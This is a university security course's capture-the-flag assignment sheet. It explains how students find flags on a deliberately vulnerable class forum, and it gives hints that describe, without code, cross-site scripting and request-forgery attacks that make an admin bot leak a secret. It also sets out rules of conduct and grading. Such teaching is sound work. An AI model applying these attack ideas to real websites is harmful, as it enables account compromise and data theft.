• This project is due at 11:59pm on Wednesday, Dec 4, 2024. This is a final deadline because the semester is ending, there cannot be late submissions.

Description and Deliverables

In this project, you will gain hands on experience leveraging web and browser-based exploits to make a web service do unexpected things. Like the previous one, this project is structured as a Capture The Flag (CTF), which is a common format in cybersecurity competitions. You will be given access to a vulnerable website, and your task is to locate eight flags hidden in the website.

To receive full credit for this project, you will turn in a single file:

• A file named project7/flags.txt that contains the flags that you will capture from the site.

The exact format of this deliverable is described in detail below.

Getting Started with cynews

The flags are located on a discussion forum for cy2550. Each of you has your own instance of this website hosted at <yourgithub>.p7.neucrypt.org. For example, my site is located at https://abhvious.p7.neucrypt.org.

1. You must first login to the site. Only authorized users with valid logins can see the content of your site. There are only two users on each site, you and the admin account. In order to retrieve your login credentials, you will need to decrypt a GPG-encrypted message posted in piazza. We will download the GPG key that you uploaded to your github account in project 5. (Many of you did not do that step, so please do it now.)

2. There are no flags on the login page. All of the flags can be found by inspecting and interacting with the pages that you can find after login.

3. You should learn how the site works by posting new questions on the site and new comments on those posts. Inspect the Debug console to see how the post works. Inspect the source of the page. Play with the options available to you as the creator of the post. Learning how the site works will help you find the flags. You can find some basic tutorials on Javascript with some searches, but you only need the few javascript skills that we demonstrated and practiced in the class exercise. Some behaviour may be unlocked as you interact with the site, so keep playing with it.

4. Finding the flags increases in difficulty as you progress throughout the project. The first few flags require some attention to detail and clever thinking in terms of how the site is designed, and what you should and should not be able to do.

5. As mentioned, a key tool for starting this project is to use the Developer Tools in your browser. This tool shows you the source code for the website and all files and resources requested by the site, among other useful things. Other tools like Postman and BurpSuite are tools used in real-life scenarios, but the Developer Tools will be the easiest and most accessible for most students.

6. Don’t get stuff. Try stuff. One of the main points of security is to be curious and learn how systems work.

Identifying Flags

Your goal is to locate the flags hidden throughtout the site.

All flags follow the following format:

flag#:<64 characters of digits and letters a-f>

For example, a secret flag might look like this:

flag1:d1bc8d3ba4afc7e109612cb73acbdddac052c93025aa1f82942edabb7deb82a1

The secret flags can be anywhere within the website: inside the source code, inside headers sent between the browser and the server, inside databases stored on the server, behind xss, etc. It is 100% feasible to find all flags; none have been hidden in such a way that it requires wizard-level exploitation skills, or hashcat to locate.

Note: All flags are unique per user.

Hints

Some of the flags may require you to attempt to do a cross-site scripting attack. The very last flag requires you to perform a same-site request forgery attack. In particular, this flag does not appear under your login. Instead, this flag occurs when the admin user logs in.

You naturally do not have the admin user login. However, an automated robot that does have the admin credentials for your site will periodically visit the top few posts on your site. Perhaps you are able to exploit a vulnerability in the site which causes this flag to be leaked to you. As a hint, recall the XSRF, or cross-site request forgery example that was discussed in lecture. Through a vulnerability in this site, you can perhaps inject a javascript attack that causes the admin to inadvertently leak a secret to you.

Rules

To make this assignment fun for everyone, we ask that students obey some basic rules of decorum.

1. To keep the site private within the class, we ask you do not share the URL of the website with people outside of this class.

2. Only log in to your own instance. Do not login to another student’s instance. Do not attack your classmates.

3. Do not denial of service the server. Examples of denial of service attacks include but are not limited to: intentionally running large numbers of processes to control CPU and memory resources, flooding the server with network traffic, and scraping the website. Do not scrape the website.

4. This website is supposed to be intentionally vulnerable. This means you will have power to do destructive things that (hopefully) you shouldn’t be able to do on a normal site. Do not perform any destructive actions that will harm the integrity of the backend server or database. If you find a vulnerability that does not eventually lead you to a flag and has the possibility to be destructive, let the course staff know ASAP.

Any student that fails to follow these rules, i.e. intentionally attempts to make mischief, will receive a zero on the assignment. That said, we understand that mistakes happen! If you accidentally make changes to accounts that you believe may hinder others’ abilities to complete the assignment, let us know immediately and we will repair the situation.

Submission details

To receive full credit on this assignment, you must turn in a single (ASCII formatted with Unix-style line breaks) text file named flags.txt that contains the flags that you have recovered.

You should create a file named flags.txt that contains your captured flags. Each flag should be on its own line. For example, your flags.txt file might look like the following:

flag0:e09f9656f306b645e9877dd9aa84d1957447effe49abea0a4400000000000000
flag1:d1bc8d3ba4afc7e109612cb73acbddeac052c93025aa1f82942edabb7deb82a1
flag2:de0b9a001c104c5bef8bc23afe379de3cd657bfcee00f7aa0829d0ed1e457106
flag3:0ac837a51686ab59ab1a3894fa910ee58dd597ed18cba114cd2a28bb05b8b6d9
flag4:f7530598a6ced26e95e8364fa64cdbe6cd24a499d12f4a923b5c48e1abc0f9ca
flag5:4bcfc21affe09f9656f306b645e9877dd9aa84d1957447effe49abea0a440000
flag6:21affe09f9656f306b645e9877dd9aa84d1957447effe49abea0a44000000000
flag7:affe09f9656f306b645e9877dd9aa84d1957447effe49abea0a4400000000000

Submit your project7/flags.txt via a signed Github commit and submit this to gradescope.

Submitting

Please follow these directions exactly:

1. Create a directory project7 under your git repo.
2. Add the file flags.txt to this directory.
3. Commit your new file in a signed commit. Feel free to resubmit the project as many times as you like. It is ok to have extra files in the repository as well, just make sure you have this one.

Note: We require you to follow these directions exactly. If your repository does not include the project7/flags.txt file as described above, you will lose points, and possibly receive no credit.

Grading

This project is worth 100 points:

• 19 points per flag for the first 4 flags
• 5 points per flag for the last 4 flags
• 4 points for signing your commit

Points can be lost for turning in files in incorrect formats (e.g. not UNIX-line break ASCII), failing to follow specified formatting and naming conventions, or encrypting/signing your file using the wrong keys.

Tips

CTF projects are puzzles: they’re best when students are allowed to figure things out for themselves. Thus, we’re reluctant to post tips openly that would give away key aspects of the game. That said, if you feel stuck, or like you don’t know where to begin, that is okay! Begin by exploring the site using the hints given above.
Think about the types of attacks we have just discussed in class and how they might apply here.